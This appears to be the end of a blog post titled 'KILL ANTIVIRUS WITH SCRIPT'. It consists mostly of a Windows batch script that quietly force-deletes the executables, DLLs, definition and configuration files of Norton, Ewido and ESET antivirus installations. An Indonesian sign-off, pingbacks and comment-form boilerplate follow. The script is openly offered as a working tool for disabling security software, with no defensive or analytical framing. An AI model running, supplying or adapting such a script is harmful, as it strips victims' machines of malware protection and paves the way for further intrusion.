%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.dll > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.isu > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.hlp > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.cnt > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.dat > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.ulg > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.ini > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.txt > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.dll > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.cnt > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.hlp > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.def > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.ini > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.txt > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.dat > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.log > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.reg > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\*.dll > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\*.log > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\*.idx > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\*.ini > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\*.hlp > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\*.orgt > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\*.dll > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\*.dat > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\ewidoa~1\*.dll > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\ewidoa~1\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\ewidoa~1\*.dat > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\ewidoa~1\*.mo > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\ESET\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\ESET\*.dll > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\ESET\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\ESET\Instalar\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\ESET\Instalar\*.dll > nul
%limpa%

SEMOGA BERMANFAAT..!!!


Advertisements

3 thoughts on “KILL ANTIVIRUS WITH SCRIPT

  1. Pingback: Ada Disini Semua. Design, Networking, Download, Heacking,Sale, Order, Tips and Trick « Men9 Lagi Ngeblog

  2. Pingback: Putrawarog's Blog

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s